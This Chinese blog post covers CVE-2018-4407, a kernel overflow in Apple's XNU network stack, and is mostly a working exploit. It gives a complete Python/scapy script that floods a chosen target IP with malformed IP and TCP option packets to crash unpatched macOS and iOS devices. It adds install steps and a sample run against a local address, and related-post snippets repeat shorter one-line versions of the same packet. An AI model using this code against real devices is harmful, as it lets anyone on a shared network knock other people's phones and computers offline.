CVE-2018-4407 苹果设备远程溢出漏洞

最新推荐文章于 2021-07-27 16:17:46 发布
最新推荐文章于 2021-07-27 16:17:46 发布
阅读量593 收藏
点赞数
分类专栏: iOS/MacOSX/移动安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SysProgram/article/details/85494962
版权

2018-10-30 公开了一个 Apple 设备的远程代码执行漏洞 CVE-2018-4407,该漏洞是收到畸形数据包后,向发送方报告错误,在构造 ICMP 数据包时发生了溢出,影响 macOS 10.13.6 及以下版本,iOS 11 及以下版本

python exp,能够造成让系统崩溃,代码如下:

# CVE-2018-4407 ICMP DOS
# https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
# from https://twitter.com/ihackbanme
import sys
try:
    from scapy.all import *
except Exception as e:
    print ("[*] You need install scapy first:\n[*] sudo pip install scapy ")
if __name__ == '__main__':
    try:
        check_ip = sys.argv[1]
        print ("[*] !!!!!!Dangerous operation!!!!!!")
        print ("[*] Trying CVE-2018-4407 ICMP DOS " + check_ip)
        for i in range(8,20):
            send(IP(dst=check_ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
        print ("[*] Check Over!! ")
    except Exception as e:
        print "[*] usage: sudo python check_icmp_dos.py 127.0.0.1"

测试 exp 之前安装一下 scapy

sudo pip install scapy

然后开始见证奇迹:

$ sudo python ./icmp_ddos.py 192.168.2.238
Fontconfig warning: ignoring UTF-8: not a valid region tag
Fontconfig warning: ignoring UTF-8: not a valid region tag
[*] !!!!!!Dangerous operation!!!!!!
[*] Trying CVE-2018-4407 ICMP DOS 192.168.2.238
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
[*] Check Over!!

原文地址:https://www.exchen.net/apple_xnu_icmp_error_cve-2018-4407.html

sysprogram
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Centos7系统安全漏洞及修复方案
sara的博客
04-20 2万+
以下所有漏洞均为Centos7的系统漏洞修复,为离线内网环境;某些服务由Docker镜像部署。 1、Docker Remote API 未授权访问漏洞【原理扫描】 详细描述 Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。 Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集.
CVE-2019-8603(macOS漏洞):利用一个越界读漏洞实现了Safari沙箱逃逸
systemino的博客
06-19 509
在今年Pwn2Own中,有研究人员发现利用一个越界读漏洞竟然实现了Safari沙箱逃逸,然后利用kextutil中存在的TOCTOU获得内核代码执行权限。 目前该漏洞已经被命名为CVE-2019-8603,简单来说,这是一个存在于Dock和苹果卸载网站(com.apple.uninstalld)中的堆越界读取漏洞,该漏洞将导致攻击者调用CFRelease并在macOS上实现Safari浏览器沙盒...
CVE-2018-4407 POC
co0ontty的博客
12-21 290
CVE-2018-4407 POC import sys try: from scapy.all import * except Exception as e: print ("[*] You need install scapy first:\n[*] sudo pip install scapy ") if __name__ == '__main__': try: ...
CVE-2019-8660 苹果IMessage漏洞利用
小小的花园里面挖呀挖呀~
08-01 982
Google Project Zero研究人员在iOS操作系统中发现了多个漏洞,其中有 四个漏洞(CVE-2019-8660、CVE-2019-8662、CVE-2019-8647、CVE-2019-8641) 可造成无交互远程任意代码执行,一个漏洞可造成远程任意文件读取(CVE-201 9-8646) CVE-2019-8660此漏洞是存在于iOS Core Data框架以及Siri组件中的内...
CVE-2018-4407缓冲区溢出
Jiajiajiang_的博客
11-16 571
漏洞使得攻击者只要接入同一WIFI网络,即可向其他毫不知情的用户发送恶意数据包来触发Mac或IOS设备的崩溃和重启。由于该漏洞存在于系统网络核心代码,因此任何反病毒软件均无法防御。 易受攻击的设备: Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备) Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新20...
CVE-2018-4407(IOS缓冲区溢出漏洞)exp
weixin_30814223的博客
03-09 250
CVE-2018-4407为ios缓冲区溢出漏洞 exp: import scapyfrom scapy.all import * send(IP(dst="同一局域网内目标Ip",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)])) 漏洞范围: 运行以下操作系统的设...
Apple任意代码执行漏洞通告
爱国小白帽
07-27 1201
报告编号:B6-2021-072701 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-27 0x01 漏洞简述 2021年07月27日,360CERT监测发现Apple发布了macOS、iOS、iPadOS远程代码执行漏洞的风险通告,漏洞编号为CVE-2021-30807,漏洞等级:高危,漏洞评分:8.5。 macOS、iOS、iPadOS是Apple公司的操作系统,在全球拥有庞大的用户基数。这些操作系统中的IOMobileFrameBuffer内核拓展中存在一处任意代码.
32种针对硬件与固件的漏洞攻击
dian66_ITO的博客
06-28 2353
2018年1月,全球计算机行业因为Meltdown以及Spectre这两个在处理器中存在的新型漏洞而受到威胁。这两个漏洞直接打破了分离内核以及用户内存的OS安全边界。这两个漏洞基于了现代CPU的预测执行功能,而缓解这两个漏洞带来的影响则需要有史以来最大的补丁计划,范围涉及CPU制造商、设备制造商以及操作系统供应商。 Meltdown和Spectre绝不是最早的硬件漏洞,但它们确实引起安全研究者开始注意这种类型的漏洞。从那时开始,许多学术界与私人领域的研究者,都开始研究CPU以及其他硬件组件的低阶运行情况,以
模糊测试--强制性安全漏洞发掘
热门推荐
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
iOS Mail 客户端漏洞很可能已经被远程利用
systemino的博客
05-14 955
在ZecOps 团队宣布在iOS的默认邮件应用程序中发现RCE漏洞之后,已经有很多用户联系了他们,他们怀疑自己成为了这个漏洞的攻击目标。 在这篇文章中,我们将介绍一种简单的方法来喷洒堆,通过这种方法,我们可以证明远程利用这个漏洞是可能的。除此之外,我们还将提供两个在野外观察到的触发器示例。 目前,我们已经发现了该漏洞具有以下攻击性能: 1.邮件应用程序中的远程溢出; 2.能够通过传入邮件由攻击者控制的输入内容来远程触发漏洞; 3.改变代码执行的能力; 4.事实提升访问内核的权限; 不过,..
iOS11拒绝服务攻击
02-24
CVE-2018-4407是Kevin发现的XNU系统内核中的堆缓冲区溢出漏洞,Apple把它分为了远程代码执行漏洞,攻击者有可能利用缓冲区溢出进行远程代码执行。不过目前Kevin给出的PoC仅仅是造成系统崩溃重启。
kaggle-kernel packages
lzv2v的专栏
04-28 4290
TimeLine #Log Message 0.8s0Please wait a moment while I gather a list of all available modules... 1.1s1/opt/conda/lib/python3.6/site-packages/Bio/PopGen/Async/__init__.py:17: BiopythonDeprecat
mac安装启动fiddler报错‘ignoring UTF-8: not a valid region tag’
weixin_41633501的博客
05-29 1726
1. cd ~ 2. open .bash_profile 3. export LANG="en_US.UTF-8" export LC_COLLATE="en_US.UTF-8" export LC_CTYPE="en_US.UTF-8" export LC_MESSAGES="en_US.UTF-8" export LC_MONETARY="en_US.UTF-8" expo...
Pycharm运行时,报编码错误
weixin_43992799的博客
07-14 812
不知道改动了pycharn哪里的设置,导致只要print(“XXX吉祥”),带中文就会编码错误。后来上网找到在第一行加# -- coding: utf-8 -- 就可以运行了。后来知道,将又右下角的GBK格式改为utf-8也同样可以。 ...
QT5编辑中文字符编译报错问题解决办法
无与才哥的专栏
02-17 4149
最近开始学习QT编程,发现还蛮好用的。就是中文字符的问题把我搞得头很大,一旦代码里面有中文字符,编译就会报错,于是乎到处找解决办法,无奈QT的资源好像有些少,幸得最终找到一个帖子,最后解决了,记录下。 帖子链接:http://bbs.qter.org/forum.php?mod=viewthread&tid=2296 用的是5.3.2,我的设置: Qt Creator环境设置:默认编码:UT
缓冲区溢出漏洞CVE-2018-4407)可导致内核崩溃,苹果多款操作系统均受影响
a1b2c3是弱口令
11-01 1028
漏洞使得攻击者只要接入同一Wi-Fi网络,即可向其他毫不知情的用户发送恶意数据包来触发任何Mac或iOS设备的崩溃和重启。由于该漏洞存在于系统网络核心代码,因此任何反病毒软件均无法防御。 运行以下操作系统的设备易受攻击: Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备) Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(...
CVE-2018-4407 漏洞复现POC
weixin_30608131的博客
11-01 234
pip install scapy    import scapy from scapy.all import * send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))    转载于:https:...
详细分析Apple macOS 6LowPAN 漏洞CVE-2020-9967)
smellycat000的专栏
12-24 921
聚焦源代码安全,网罗国内外最新资讯!安全研究员 Alex Plaskett 在2020年5月向苹果报告了影响MacOS Big Sur 的一个漏洞CVE-2020-9967)。...
苹果修复三个已遭利用的 iOS 0day
smellycat000的专栏
11-06 382
聚焦源代码安全,网罗国内外最新资讯!今日,苹果发布安全更新,修复了24个影响 iOS 14.2和 iPadOS 14.2的漏洞,其中包含已修复三个遭在野利用的0day (CVE-202...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值